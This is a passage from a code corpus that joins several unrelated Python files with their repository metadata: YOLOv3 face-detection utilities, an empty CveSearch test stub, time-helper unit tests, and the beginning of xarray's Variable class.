    per-class Non-Maximum Suppression to further filter detections.
    Returns a list (one entry per image, None when nothing survives) of
    detections with shape:
        (x1, y1, x2, y2, object_conf, class_conf, class)
    """
    min_wh = 2  # (pixels) minimum box width and height
    output = [None] * len(prediction)
    for image_i, pred in enumerate(prediction):
        # Experiment: Prior class size rejection
        # x, y, w, h = pred[:, 0], pred[:, 1], pred[:, 2], pred[:, 3]
        # a = w * h # area
        # ar = w / (h + 1e-16) # aspect ratio
        # n = len(w)
        # log_w, log_h, log_a, log_ar = torch.log(w), torch.log(h), torch.log(a), torch.log(ar)
        # shape_likelihood = np.zeros((n, 60), dtype=np.float32)
        # x = np.concatenate((log_w.reshape(-1, 1), log_h.reshape(-1, 1)), 1)
        # from scipy.stats import multivariate_normal
        # for c in range(60):
        # shape_likelihood[:, c] =
        # multivariate_normal.pdf(x, mean=mat['class_mu'][c, :2], cov=mat['class_cov'][c, :2, :2])
        # Filter out confidence scores below threshold
        class_conf, class_pred = pred[:, 5:].max(1)  # best class confidence and its index
        pred[:, 4] *= class_conf  # final conf = obj_conf * class_conf (mutates pred in place)
        i = (pred[:, 4] > conf_thres) & (pred[:, 2] > min_wh) & (pred[:, 3] > min_wh)
        # s2=time.time()
        pred2 = pred[i]
        # print("++++++pred2 = pred[i]",time.time()-s2, pred2)
        # If none are remaining => process next image
        if len(pred2) == 0:
            continue
        # Select predicted classes
        class_conf = class_conf[i]
        class_pred = class_pred[i].unsqueeze(1).float()
        # Box (center x, center y, width, height) to (x1, y1, x2, y2)
        pred2[:, :4] = xywh2xyxy(pred2[:, :4])
        # pred[:, 4] *= class_conf # improves mAP from 0.549 to 0.551
        # Detections ordered as (x1y1x2y2, obj_conf, class_conf, class_pred)
        pred2 = torch.cat((pred2[:, :5], class_conf.unsqueeze(1), class_pred), 1)
        # Get detections sorted by decreasing confidence scores
        pred2 = pred2[(-pred2[:, 4]).argsort()]
        det_max = []
        nms_style = 'MERGE'  # 'OR' (default), 'AND', 'MERGE' (experimental)
        for c in pred2[:, -1].unique():
            dc = pred2[pred2[:, -1] == c]  # select detections of class c
            dc = dc[:min(len(dc), 100)]  # limit to first 100 boxes
            # Non-maximum suppression
            if nms_style == 'OR':  # default: keep best, drop overlaps, repeat
                # METHOD1
                # ind = list(range(len(dc)))
                # while len(ind):
                # j = ind[0]
                # det_max.append(dc[j:j + 1]) # save highest conf detection
                # reject = (bbox_iou(dc[j], dc[ind]) > nms_thres).nonzero()
                # [ind.pop(i) for i in reversed(reject)]
                # METHOD2
                while dc.shape[0]:
                    det_max.append(dc[:1])  # save highest conf detection
                    if len(dc) == 1:  # Stop if we're at the last detection
                        break
                    iou = bbox_iou(dc[0], dc[1:])  # iou with other boxes
                    dc = dc[1:][iou < nms_thres]  # remove ious > threshold
            elif nms_style == 'AND':  # requires overlap, single boxes erased
                # NOTE(review): uses a hard-coded 0.5 overlap test, not nms_thres
                while len(dc) > 1:
                    iou = bbox_iou(dc[0], dc[1:])  # iou with other boxes
                    if iou.max() > 0.5:
                        det_max.append(dc[:1])
                    dc = dc[1:][iou < nms_thres]  # remove ious > threshold
            elif nms_style == 'MERGE':  # weighted mixture box
                # Replace the best box with the confidence-weighted average of
                # all boxes overlapping it, then drop the merged group.
                while len(dc):
                    i = bbox_iou(dc[0], dc) > nms_thres  # iou with other boxes
                    weights = dc[i, 4:5]
                    dc[0, :4] = (weights * dc[i, :4]).sum(0) / weights.sum()
                    det_max.append(dc[:1])
                    dc = dc[i == 0]
        if len(det_max):
            det_max = torch.cat(det_max)  # concatenate per-class survivors
            output[image_i] = det_max[(-det_max[:, 4]).argsort()]  # sort by confidence
    return output
def letterbox(img, height=416, augment=False, color=(127.5, 127.5, 127.5)):
    """Resize a rectangular image to a padded `height` x `height` square.

    Returns (padded image, resize ratio, width padding dw, height padding dh).
    With augment=True a random interpolation method is used.
    """
    shape = img.shape[:2]  # shape = [height, width]
    ratio = float(height) / max(shape)  # ratio = old / new
    new_shape = (round(shape[1] * ratio), round(shape[0] * ratio))  # (w, h) for cv2.resize
    dw = (height - new_shape[0]) / 2  # width padding
    dh = (height - new_shape[1]) / 2  # height padding
    # The -0.1/+0.1 rounding splits an odd padding pixel between the two sides.
    top, bottom = round(dh - 0.1), round(dh + 0.1)
    left, right = round(dw - 0.1), round(dw + 0.1)
    # resize img
    if augment:
        interpolation = np.random.choice([None, cv2.INTER_NEAREST, cv2.INTER_LINEAR,
                                          None, cv2.INTER_NEAREST, cv2.INTER_LINEAR,
                                          cv2.INTER_AREA, cv2.INTER_CUBIC, cv2.INTER_LANCZOS4])
        if interpolation is None:
            img = cv2.resize(img, new_shape)
        else:
            img = cv2.resize(img, new_shape, interpolation=interpolation)
    else:
        img = cv2.resize(img, new_shape, interpolation=cv2.INTER_NEAREST)
    # print("resize time:",time.time()-s1)
    img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color)  # padded square
    return img, ratio, dw, dh
#---------------------------------------------------------
# model_path = './coco_model/yolov3_coco.pt' # 检测模型路径
# model_arch = 'yolov3' # 模型类型
# img_size = 416 # 图像尺寸
# conf_thres = 0.35# 检测置信度
# nms_thres = 0.5 # nms 阈值
class yolo_v3_face_model(object):
    """YOLO v3 / v3-tiny face detector.

    Builds the network with anchors rescaled to the requested input size,
    loads weights from ``model_path``, and exposes :meth:`predict`, which
    returns face boxes for a BGR image.
    """
    def __init__(self,
        model_path = './components/face_detect/weights/face_yolo_416-20210418.pt',
        model_arch = 'yolov3',
        yolo_anchor_scale = 1.,
        img_size=416,
        conf_thres=0.4,
        nms_thres=0.4,):
        """
        Parameters
        ----------
        model_path : str
            Path to the .pt checkpoint (expects a dict with a 'model' state dict).
        model_arch : str
            'yolov3' or a name containing 'tiny' for Yolov3Tiny.
        yolo_anchor_scale : float
            Extra anchor scaling applied for the tiny architecture.
        img_size : int
            Square network input size; anchors are rescaled from the 416 baseline.
        conf_thres, nms_thres : float
            Detection confidence and NMS IoU thresholds used by predict().
        """
        print("yolo v3 face_model loading : {}".format(model_path))
        self.use_cuda = torch.cuda.is_available()
        self.device = torch.device("cuda:0" if self.use_cuda else "cpu")
        self.img_size = img_size
        self.classes = ["Face"]  # single-class detector
        self.num_classes = len(self.classes)
        self.conf_thres = conf_thres
        self.nms_thres = nms_thres
        #-----------------------------------------------------------------------
        weights = model_path
        # Anchors are defined for a 416 input; rescale them to img_size.
        if "tiny" in model_arch:
            a_scalse = 416. / img_size * yolo_anchor_scale
            anchors = [(10, 14), (23, 27), (37, 58), (81, 82), (135, 169), (344, 319)]
            anchors_new = [(int(a[0] / a_scalse), int(a[1] / a_scalse)) for a in anchors]
            model = Yolov3Tiny(self.num_classes, anchors=anchors_new)
        else:
            a_scalse = 416. / img_size
            anchors = [(10, 13), (16, 30), (33, 23), (30, 61), (62, 45), (59, 119), (116, 90), (156, 198), (373, 326)]
            anchors_new = [(int(a[0] / a_scalse), int(a[1] / a_scalse)) for a in anchors]
            model = Yolov3(self.num_classes, anchors=anchors_new)
        #-----------------------------------------------------------------------
        self.model = model
        self.device = select_device()  # final device choice (overrides the initial torch.device above)
        self.use_cuda = torch.cuda.is_available()
        # Load weights
        if os.access(weights, os.F_OK):  # check the checkpoint file exists
            self.model.load_state_dict(torch.load(weights, map_location=lambda storage, loc: storage)['model'])
        else:
            print('------- >>> error : model not exists')
            # BUG FIX: previously `return False`, which makes __init__ raise a
            # confusing "TypeError: __init__() should return None". Raise a
            # clear, catchable error instead.
            raise FileNotFoundError(f"yolo v3 face model weights not found: {weights}")
        self.model.eval()  # inference mode
        acc_model('', self.model)
        self.model = self.model.to(self.device)
    def predict(self, img_, vis):
        """Detect faces in the BGR image `img_`.

        Returns a list of (x1, y1, x2, y2, confidence) tuples in original-image
        coordinates; draws boxes on `img_` in place when `vis` is truthy.
        """
        with torch.no_grad():
            img = process_data(img_, self.img_size)
            img = torch.from_numpy(img).unsqueeze(0).to(self.device)
            pred, _ = self.model(img)  # forward pass
            detections = non_max_suppression(pred, self.conf_thres, self.nms_thres)[0]  # nms
            if (detections is None) or len(detections) == 0:
                return []
            # Rescale boxes from the network input size back to the true image size.
            detections[:, :4] = scale_coords(self.img_size, detections[:, :4], img_.shape).round()
            output_dict_ = []
            for *xyxy, conf, cls_conf, cls in detections:
                label = '%s %.2f' % (self.classes[0], conf)
                x1, y1, x2, y2 = xyxy
                output_dict_.append((float(x1), float(y1), float(x2), float(y2), float(conf.item())))
                if vis:
                    plot_one_box(xyxy, img_, label=label, color=(0, 175, 255), line_thickness=2)
            return output_dict_
| 41.573718 | 116 | 0.545602 |
ace09b4976a3bfe0b43e1b45a23b421cdb461199 | 1,230 | py | Python | test/test_cve_search.py | LayeredInsight/layint_api_python | a5c9a5b24098bd823c5102b7ab9e4745432f19b4 | [
"Apache-2.0"
] | null | null | null | test/test_cve_search.py | LayeredInsight/layint_api_python | a5c9a5b24098bd823c5102b7ab9e4745432f19b4 | [
"Apache-2.0"
] | null | null | null | test/test_cve_search.py | LayeredInsight/layint_api_python | a5c9a5b24098bd823c5102b7ab9e4745432f19b4 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
Layered Insight Assessment, Compliance, Witness & Control
LI Assessment & Compliance performs static vulnerability analysis, license and package compliance. LI Witness provides deep insight and analytics into containerized applications. Control provides dynamic runtime security and analytics for containerized applications. You can find out more about the Layered Insight Suite at [http://layeredinsight.com](http://layeredinsight.com).
OpenAPI spec version: 0.10
Contact: help@layeredinsight.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import layint_api
from layint_api.rest import ApiException
from layint_api.models.cve_search import CveSearch
class TestCveSearch(unittest.TestCase):
    """Unit test stubs for the generated CveSearch model."""
    def setUp(self):
        # No fixtures needed yet.
        pass
    def tearDown(self):
        # No cleanup needed yet.
        pass
    def testCveSearch(self):
        """
        Test construction of the CveSearch model.
        """
        # FIXME: construct object with mandatory attributes with example values
        #model = layint_api.models.cve_search.CveSearch()
        pass
# Allow running this test module directly with `python <file>`.
if __name__ == '__main__':
    unittest.main()
| 27.333333 | 383 | 0.730081 |
ace09b994d65d88f8ed40c382ae1485a715d80ff | 1,118 | py | Python | test/utils/test_time.py | SarithT/xapitrader | 0018bc37d9756a10c328def90d042ef39857cfb5 | [
"MIT"
] | null | null | null | test/utils/test_time.py | SarithT/xapitrader | 0018bc37d9756a10c328def90d042ef39857cfb5 | [
"MIT"
] | null | null | null | test/utils/test_time.py | SarithT/xapitrader | 0018bc37d9756a10c328def90d042ef39857cfb5 | [
"MIT"
] | null | null | null | import unittest
from unittest.mock import Mock
import datetime
from xapitrader.utils import time
class TimeTests(unittest.TestCase):
    """Unit tests for xapitrader.utils.time helpers."""
    def test_delta_miliseconds(self):
        """delta_miliseconds returns the signed difference in epoch milliseconds."""
        from_date = datetime.datetime(year=2010, month=5, day=4)
        to_date = datetime.datetime(year=2010, month=4, day=6)
        from_date_miliseconds = 1272963600000
        to_date_miliseconds = 1270544400000
        delta = time.delta_miliseconds(from_date, to_date)
        self.assertEqual(delta, from_date_miliseconds-to_date_miliseconds)
    def test_datetime_from_now(self):
        """datetime_from_now offsets from a mocked 'now'.

        NOTE(review): the expected value (Apr 4 20:00 from a mocked Apr 10) implies
        the offset is subtracted — confirm against the implementation.
        """
        time.now=Mock(return_value=datetime.datetime(year=2010, month=4, day=10))
        date = time.datetime_from_now(days=5, hours=4)
        self.assertEqual(date,datetime.datetime(year=2010, month=4, day=4, hour=20))
    def test_miliseconds_from_initial(self):
        """miliseconds_from_initial converts a datetime to epoch milliseconds."""
        to_date = datetime.datetime(year=2010, month=5, day=4)
        ms_from_initial= time.miliseconds_from_initial(to_date)
        expected_miliseconds = 1272931200000
        self.assertEqual(ms_from_initial, expected_miliseconds)
# Allow running this test module directly with `python <file>`.
if __name__ == '__main__':
    unittest.main()
ace09c6f48211e667796f5e8fd93839fa186d4cb | 106,652 | py | Python | xarray/core/variable.py | bhumikapaharia/xarray | 39e586f96b8f23d3703a781c59c2ee01eb9d598a | [
"CC-BY-4.0",
"PSF-2.0",
"BSD-2-Clause",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | xarray/core/variable.py | bhumikapaharia/xarray | 39e586f96b8f23d3703a781c59c2ee01eb9d598a | [
"CC-BY-4.0",
"PSF-2.0",
"BSD-2-Clause",
"Apache-2.0",
"BSD-3-Clause"
] | 8 | 2021-05-17T06:35:28.000Z | 2022-01-10T17:05:35.000Z | xarray/core/variable.py | bhumikapaharia/xarray | 39e586f96b8f23d3703a781c59c2ee01eb9d598a | [
"CC-BY-4.0",
"PSF-2.0",
"BSD-2-Clause",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | import copy
import itertools
import numbers
import warnings
from collections import defaultdict
from datetime import timedelta
from typing import (
Any,
Dict,
Hashable,
List,
Mapping,
Optional,
Sequence,
Tuple,
TypeVar,
Union,
)
import numpy as np
import pandas as pd
import xarray as xr # only for Dataset and DataArray
from . import common, dtypes, duck_array_ops, indexing, nputils, ops, utils
from .arithmetic import VariableArithmetic
from .common import AbstractArray
from .indexes import PandasIndex, wrap_pandas_index
from .indexing import BasicIndexer, OuterIndexer, VectorizedIndexer, as_indexable
from .options import _get_keep_attrs
from .pycompat import (
cupy_array_type,
dask_array_type,
integer_types,
is_duck_dask_array,
)
from .utils import (
NdimSizeLenMixin,
OrderedSet,
_default,
decode_numpy_dict_values,
drop_dims_from_indexers,
either_dict_or_kwargs,
ensure_us_time_resolution,
infix_dims,
is_duck_array,
maybe_coerce_to_str,
)
NON_NUMPY_SUPPORTED_ARRAY_TYPES = (
(
indexing.ExplicitlyIndexed,
pd.Index,
)
+ dask_array_type
+ cupy_array_type
)
# https://github.com/python/mypy/issues/224
BASIC_INDEXING_TYPES = integer_types + (slice,)
VariableType = TypeVar("VariableType", bound="Variable")
"""Type annotation to be used when methods of Variable return self or a copy of self.
When called from an instance of a subclass, e.g. IndexVariable, mypy identifies the
output as an instance of the subclass.
Usage::
class Variable:
def f(self: VariableType, ...) -> VariableType:
...
"""
class MissingDimensionsError(ValueError):
    """Error class used when we can't safely guess a dimension name."""
    # inherits from ValueError for backward compatibility
    # TODO: move this to an xarray.exceptions module?
def as_variable(obj, name=None) -> "Union[Variable, IndexVariable]":
    """Convert an object into a Variable.

    Parameters
    ----------
    obj : object
        Object to convert into a Variable.

        - If the object is already a Variable, return a shallow copy.
        - Otherwise, if the object has 'dims' and 'data' attributes, convert
          it into a new Variable.
        - If all else fails, attempt to convert the object into a Variable by
          unpacking it into the arguments for creating a new Variable.
    name : str, optional
        If provided:

        - `obj` can be a 1D array, which is assumed to label coordinate values
          along a dimension of this given name.
        - Variables with name matching one of their dimensions are converted
          into `IndexVariable` objects.

    Returns
    -------
    var : Variable
        The newly created variable.
    """
    from .dataarray import DataArray
    # TODO: consider extending this method to automatically handle Iris and
    # pandas objects.
    if isinstance(obj, DataArray):
        # extract the primary Variable from DataArrays
        obj = obj.variable
    # Dispatch on obj's type; order matters (Variable before tuple/scalar cases).
    if isinstance(obj, Variable):
        obj = obj.copy(deep=False)
    elif isinstance(obj, tuple):
        # (dims, data[, attrs[, encoding]]) tuple form
        if isinstance(obj[1], DataArray):
            # TODO: change into TypeError
            warnings.warn(
                (
                    "Using a DataArray object to construct a variable is"
                    " ambiguous, please extract the data using the .data property."
                    " This will raise a TypeError in 0.19.0."
                ),
                DeprecationWarning,
            )
        try:
            obj = Variable(*obj)
        except (TypeError, ValueError) as error:
            # use .format() instead of % because it handles tuples consistently
            raise error.__class__(
                "Could not convert tuple of form "
                "(dims, data[, attrs, encoding]): "
                "{} to Variable.".format(obj)
            )
    elif utils.is_scalar(obj):
        obj = Variable([], obj)
    elif isinstance(obj, (pd.Index, IndexVariable)) and obj.name is not None:
        # a named index labels a dimension of the same name
        obj = Variable(obj.name, obj)
    elif isinstance(obj, (set, dict)):
        raise TypeError("variable {!r} has invalid type {!r}".format(name, type(obj)))
    elif name is not None:
        data = as_compatible_data(obj)
        if data.ndim != 1:
            raise MissingDimensionsError(
                f"cannot set variable {name!r} with {data.ndim!r}-dimensional data "
                "without explicit dimension names. Pass a tuple of "
                "(dims, data) instead."
            )
        obj = Variable(name, data, fastpath=True)
    else:
        raise TypeError(
            "unable to convert object into a variable without an "
            f"explicit list of dimensions: {obj!r}"
        )
    if name is not None and name in obj.dims:
        # convert the Variable into an Index
        if obj.ndim != 1:
            raise MissingDimensionsError(
                f"{name!r} has more than 1-dimension and the same name as one of its "
                f"dimensions {obj.dims!r}. xarray disallows such variables because they "
                "conflict with the coordinates used to label dimensions."
            )
        obj = obj.to_index_variable()
    return obj
def _maybe_wrap_data(data):
    """
    Put pandas.Index and numpy.ndarray arguments in adapter objects to ensure
    they can be indexed properly.

    NumpyArrayAdapter, PandasIndex and LazilyIndexedArray should
    all pass through unmodified.
    """
    if isinstance(data, pd.Index):
        # pd.Index needs an xarray adapter for proper indexing semantics
        return wrap_pandas_index(data)
    return data
def _possibly_convert_objects(values):
    """Convert arrays of datetime.datetime and datetime.timedelta objects into
    datetime64 and timedelta64, following the pandas convention.

    Routing through a pandas.Series also validates that datetime64/timedelta64
    values fall inside the valid ns-precision date range (pandas raises
    otherwise).
    """
    as_series = pd.Series(values.ravel())
    converted = np.asarray(as_series)
    return converted.reshape(values.shape)
def as_compatible_data(data, fastpath=False):
    """Prepare and wrap data to put in a Variable.

    - If data does not have the necessary attributes, convert it to ndarray.
    - If data has dtype=datetime64, ensure that it has ns precision. If it's a
      pandas.Timestamp, convert it to datetime64.
    - If data is already a pandas or xarray object (other than an Index), just
      use the values.

    Finally, wrap it up with an adapter if necessary.
    """
    if fastpath and getattr(data, "ndim", 0) > 0:
        # can't use fastpath (yet) for scalars
        return _maybe_wrap_data(data)
    if isinstance(data, Variable):
        return data.data
    if isinstance(data, NON_NUMPY_SUPPORTED_ARRAY_TYPES):
        # explicitly-indexed / pandas / dask / cupy arrays pass straight through
        return _maybe_wrap_data(data)
    if isinstance(data, tuple):
        # treat a tuple as a single 0d object, not as a sequence
        data = utils.to_0d_object_array(data)
    if isinstance(data, pd.Timestamp):
        # TODO: convert, handle datetime objects, too
        data = np.datetime64(data.value, "ns")
    if isinstance(data, timedelta):
        data = np.timedelta64(getattr(data, "value", data), "ns")
    # we don't want nested self-described arrays
    if isinstance(data, (pd.Series, pd.Index, pd.DataFrame)):
        data = data.values
    if isinstance(data, np.ma.MaskedArray):
        mask = np.ma.getmaskarray(data)
        if mask.any():
            # replace masked entries with the dtype's fill value, promoting the
            # dtype if necessary (e.g. int -> float to hold NaN)
            dtype, fill_value = dtypes.maybe_promote(data.dtype)
            data = np.asarray(data, dtype=dtype)
            data[mask] = fill_value
        else:
            data = np.asarray(data)
    if not isinstance(data, np.ndarray) and hasattr(data, "__array_function__"):
        # other duck arrays (e.g. sparse, pint) pass through unchanged
        return data
    # validate whether the data is valid data types.
    data = np.asarray(data)
    if isinstance(data, np.ndarray) and data.dtype.kind in "OMm":
        # object/datetime/timedelta arrays: normalize to ns precision via pandas
        data = _possibly_convert_objects(data)
    return _maybe_wrap_data(data)
def _as_array_or_item(data):
    """Return the given values as a numpy array, or as an individual item if
    it's a 0d datetime64 or timedelta64 array.

    Importantly, this function does not copy data if it is already an ndarray -
    otherwise, it will not be possible to update Variable values in place.

    This function mostly exists because 0-dimensional ndarrays with
    dtype=datetime64 are broken :(
    https://github.com/numpy/numpy/issues/4337
    https://github.com/numpy/numpy/issues/7619

    TODO: remove this (replace with np.asarray) once these issues are fixed
    """
    # cupy arrays must be explicitly copied to host memory via .get()
    data = data.get() if isinstance(data, cupy_array_type) else np.asarray(data)
    if data.ndim == 0:
        # unwrap 0d datetime64/timedelta64 arrays into scalars at ns precision
        if data.dtype.kind == "M":
            data = np.datetime64(data, "ns")
        elif data.dtype.kind == "m":
            data = np.timedelta64(data, "ns")
    return data
class Variable(AbstractArray, NdimSizeLenMixin, VariableArithmetic):
"""A netcdf-like variable consisting of dimensions, data and attributes
which describe a single Array. A single Variable object is not fully
described outside the context of its parent Dataset (if you want such a
fully described object, use a DataArray instead).
The main functional difference between Variables and numpy arrays is that
numerical operations on Variables implement array broadcasting by dimension
name. For example, adding an Variable with dimensions `('time',)` to
another Variable with dimensions `('space',)` results in a new Variable
with dimensions `('time', 'space')`. Furthermore, numpy reduce operations
like ``mean`` or ``sum`` are overwritten to take a "dimension" argument
instead of an "axis".
Variables are light-weight objects used as the building block for datasets.
They are more primitive objects, so operations with them provide marginally
higher performance than using DataArrays. However, manipulating data in the
form of a Dataset or DataArray should almost always be preferred, because
they can use more complete metadata in context of coordinate labels.
"""
__slots__ = ("_dims", "_data", "_attrs", "_encoding")
    def __init__(self, dims, data, attrs=None, encoding=None, fastpath=False):
        """
        Parameters
        ----------
        dims : str or sequence of str
            Name(s) of the the data dimension(s). Must be either a string (only
            for 1D data) or a sequence of strings with length equal to the
            number of dimensions.
        data : array_like
            Data array which supports numpy-like data access.
        attrs : dict_like or None, optional
            Attributes to assign to the new variable. If None (default), an
            empty attribute dictionary is initialized.
        encoding : dict_like or None, optional
            Dictionary specifying how to encode this array's data into a
            serialized format like netCDF4. Currently used keys (for netCDF)
            include '_FillValue', 'scale_factor', 'add_offset' and 'dtype'.
            Well-behaved code to serialize a Variable should ignore
            unrecognized encoding items.
        """
        self._data = as_compatible_data(data, fastpath=fastpath)
        self._dims = self._parse_dimensions(dims)
        self._attrs = None
        self._encoding = None
        # assign through the property setters so their validation runs
        if attrs is not None:
            self.attrs = attrs
        if encoding is not None:
            self.encoding = encoding
    @property
    def dtype(self):
        """Data-type of the wrapped array."""
        return self._data.dtype
    @property
    def shape(self):
        """Tuple of dimension lengths."""
        return self._data.shape
    @property
    def nbytes(self):
        """Total bytes consumed by the data (size * itemsize)."""
        return self.size * self.dtype.itemsize
    @property
    def _in_memory(self):
        # True when the underlying data is a concrete in-memory array
        # (possibly behind a memory cache), as opposed to lazy/dask-backed data.
        return isinstance(self._data, (np.ndarray, np.number, PandasIndex)) or (
            isinstance(self._data, indexing.MemoryCachedArray)
            and isinstance(self._data.array, indexing.NumpyIndexingAdapter)
        )
    @property
    def data(self):
        """The variable's data as a duck array (numpy, dask, sparse, ...);
        falls back to ``.values`` for wrapped/lazy arrays."""
        if is_duck_array(self._data):
            return self._data
        else:
            return self.values
    @data.setter
    def data(self, data):
        # replacement data must preserve the variable's shape
        data = as_compatible_data(data)
        if data.shape != self.shape:
            raise ValueError(
                f"replacement data must match the Variable's shape. "
                f"replacement data has shape {data.shape}; Variable has shape {self.shape}"
            )
        self._data = data
    def astype(
        self: VariableType,
        dtype,
        *,
        order=None,
        casting=None,
        subok=None,
        copy=None,
        keep_attrs=True,
    ) -> VariableType:
        """
        Copy of the Variable object, with data cast to a specified type.

        Parameters
        ----------
        dtype : str or dtype
            Typecode or data-type to which the array is cast.
        order : {'C', 'F', 'A', 'K'}, optional
            Controls the memory layout order of the result. ‘C’ means C order,
            ‘F’ means Fortran order, ‘A’ means ‘F’ order if all the arrays are
            Fortran contiguous, ‘C’ order otherwise, and ‘K’ means as close to
            the order the array elements appear in memory as possible.
        casting : {'no', 'equiv', 'safe', 'same_kind', 'unsafe'}, optional
            Controls what kind of data casting may occur.

            * 'no' means the data types should not be cast at all.
            * 'equiv' means only byte-order changes are allowed.
            * 'safe' means only casts which can preserve values are allowed.
            * 'same_kind' means only safe casts or casts within a kind,
              like float64 to float32, are allowed.
            * 'unsafe' means any data conversions may be done.
        subok : bool, optional
            If True, then sub-classes will be passed-through, otherwise the
            returned array will be forced to be a base-class array.
        copy : bool, optional
            By default, astype always returns a newly allocated array. If this
            is set to False and the `dtype` requirement is satisfied, the input
            array is returned instead of a copy.
        keep_attrs : bool, optional
            By default, astype keeps attributes. Set to False to remove
            attributes in the returned object.

        Returns
        -------
        out : same as object
            New object with data cast to the specified type.

        Notes
        -----
        The ``order``, ``casting``, ``subok`` and ``copy`` arguments are only passed
        through to the ``astype`` method of the underlying array when a value
        different than ``None`` is supplied.
        Make sure to only supply these arguments if the underlying array class
        supports them.

        See Also
        --------
        numpy.ndarray.astype
        dask.array.Array.astype
        sparse.COO.astype
        """
        from .computation import apply_ufunc
        # forward only explicitly-set arguments, so array backends that don't
        # support them (e.g. sparse) aren't passed unexpected keywords
        kwargs = dict(order=order, casting=casting, subok=subok, copy=copy)
        kwargs = {k: v for k, v in kwargs.items() if v is not None}
        return apply_ufunc(
            duck_array_ops.astype,
            self,
            dtype,
            kwargs=kwargs,
            keep_attrs=keep_attrs,
            dask="allowed",
        )
    def load(self, **kwargs):
        """Manually trigger loading of this variable's data from disk or a
        remote source into memory and return this variable.

        Normally, it should not be necessary to call this method in user code,
        because all xarray functions should either work on deferred data or
        load data automatically.

        Parameters
        ----------
        **kwargs : dict
            Additional keyword arguments passed on to ``dask.array.compute``.

        See Also
        --------
        dask.array.compute
        """
        if is_duck_dask_array(self._data):
            # dask-backed: compute (kwargs forwarded to dask) and re-wrap the result
            self._data = as_compatible_data(self._data.compute(**kwargs))
        elif not is_duck_array(self._data):
            # lazy (e.g. file-backed) array: realize it as a numpy array
            self._data = np.asarray(self._data)
        return self
    def compute(self, **kwargs):
        """Manually trigger loading of this variable's data from disk or a
        remote source into memory and return a new variable. The original is
        left unaltered.

        Normally, it should not be necessary to call this method in user code,
        because all xarray functions should either work on deferred data or
        load data automatically.

        Parameters
        ----------
        **kwargs : dict
            Additional keyword arguments passed on to ``dask.array.compute``.

        See Also
        --------
        dask.array.compute
        """
        # load into a shallow copy so this variable stays lazy
        new = self.copy(deep=False)
        return new.load(**kwargs)
    def __dask_tokenize__(self):
        # Use v.data, instead of v._data, in order to cope with the wrappers
        # around NetCDF and the like
        from dask.base import normalize_token
        return normalize_token((type(self), self._dims, self.data, self._attrs))
    def __dask_graph__(self):
        # dask collection protocol: expose the wrapped array's task graph, or
        # None when the data is not dask-backed
        if is_duck_dask_array(self._data):
            return self._data.__dask_graph__()
        else:
            return None
    def __dask_keys__(self):
        return self._data.__dask_keys__()
    def __dask_layers__(self):
        return self._data.__dask_layers__()
    @property
    def __dask_optimize__(self):
        # delegate graph optimization / scheduling to the wrapped dask array
        return self._data.__dask_optimize__
    @property
    def __dask_scheduler__(self):
        return self._data.__dask_scheduler__
    def __dask_postcompute__(self):
        # rebuild a Variable around the concrete array once dask computes it
        array_func, array_args = self._data.__dask_postcompute__()
        return self._dask_finalize, (array_func,) + array_args
    def __dask_postpersist__(self):
        array_func, array_args = self._data.__dask_postpersist__()
        return self._dask_finalize, (array_func,) + array_args
    def _dask_finalize(self, results, array_func, *args, **kwargs):
        # reassemble the array from dask results and wrap it in a new Variable
        # carrying over the original dims/attrs/encoding
        data = array_func(results, *args, **kwargs)
        return Variable(self._dims, data, attrs=self._attrs, encoding=self._encoding)
@property
def values(self):
"""The variable's data as a numpy.ndarray"""
return _as_array_or_item(self._data)
@values.setter
def values(self, values):
self.data = values
def to_base_variable(self):
"""Return this variable as a base xarray.Variable"""
return Variable(
self.dims, self._data, self._attrs, encoding=self._encoding, fastpath=True
)
to_variable = utils.alias(to_base_variable, "to_variable")
    def to_index_variable(self):
        """Return this variable as an xarray.IndexVariable"""
        # Shares the underlying _data (no copy); fastpath skips re-validation.
        return IndexVariable(
            self.dims, self._data, self._attrs, encoding=self._encoding, fastpath=True
        )
to_coord = utils.alias(to_index_variable, "to_coord")
    def _to_xindex(self):
        # Temporary internal replacement for to_index(): returns an xarray
        # Index instance instead of a pd.Index instance.
        return wrap_pandas_index(self.to_index())
    def to_index(self):
        """Convert this variable to a pandas.Index"""
        # Round-trip through IndexVariable, which owns the actual conversion.
        return self.to_index_variable().to_index()
def to_dict(self, data=True):
"""Dictionary representation of variable."""
item = {"dims": self.dims, "attrs": decode_numpy_dict_values(self.attrs)}
if data:
item["data"] = ensure_us_time_resolution(self.values).tolist()
else:
item.update({"dtype": str(self.dtype), "shape": self.shape})
return item
    @property
    def dims(self):
        """Tuple of dimension names with which this variable is associated."""
        # Always a tuple: the setter normalizes via _parse_dimensions.
        return self._dims
    @dims.setter
    def dims(self, value):
        # Normalize to a tuple and validate its length against ndim.
        self._dims = self._parse_dimensions(value)
def _parse_dimensions(self, dims):
if isinstance(dims, str):
dims = (dims,)
dims = tuple(dims)
if len(dims) != self.ndim:
raise ValueError(
f"dimensions {dims} must have the same length as the "
f"number of data dimensions, ndim={self.ndim}"
)
return dims
def _item_key_to_tuple(self, key):
if utils.is_dict_like(key):
return tuple(key.get(dim, slice(None)) for dim in self.dims)
else:
return key
    def _broadcast_indexes(self, key):
        """Prepare an indexing key for an indexing operation.

        Parameters
        ----------
        key : int, slice, array-like, dict or tuple of integer, slice and array-like
            Any valid input for indexing.

        Returns
        -------
        dims : tuple
            Dimension of the resultant variable.
        indexers : IndexingTuple subclass
            Tuple of integer, array-like, or slices to use when indexing
            self._data. The type of this argument indicates the type of
            indexing to perform, either basic, outer or vectorized.
        new_order : Optional[Sequence[int]]
            Optional reordering to do on the result of indexing. If not None,
            the first len(new_order) indexing should be moved to these
            positions.
        """
        key = self._item_key_to_tuple(key)  # key is a tuple
        # key is a tuple of full size
        key = indexing.expanded_indexer(key, self.ndim)
        # Convert a scalar Variable to an integer
        key = tuple(
            k.data.item() if isinstance(k, Variable) and k.ndim == 0 else k for k in key
        )
        # Convert a 0d-array to an integer
        key = tuple(
            k.item() if isinstance(k, np.ndarray) and k.ndim == 0 else k for k in key
        )
        # Only ints/slices left: cheapest (basic) indexing path.
        if all(isinstance(k, BASIC_INDEXING_TYPES) for k in key):
            return self._broadcast_indexes_basic(key)
        self._validate_indexers(key)
        # Detect it can be mapped as an outer indexer
        # If all key is unlabeled, or
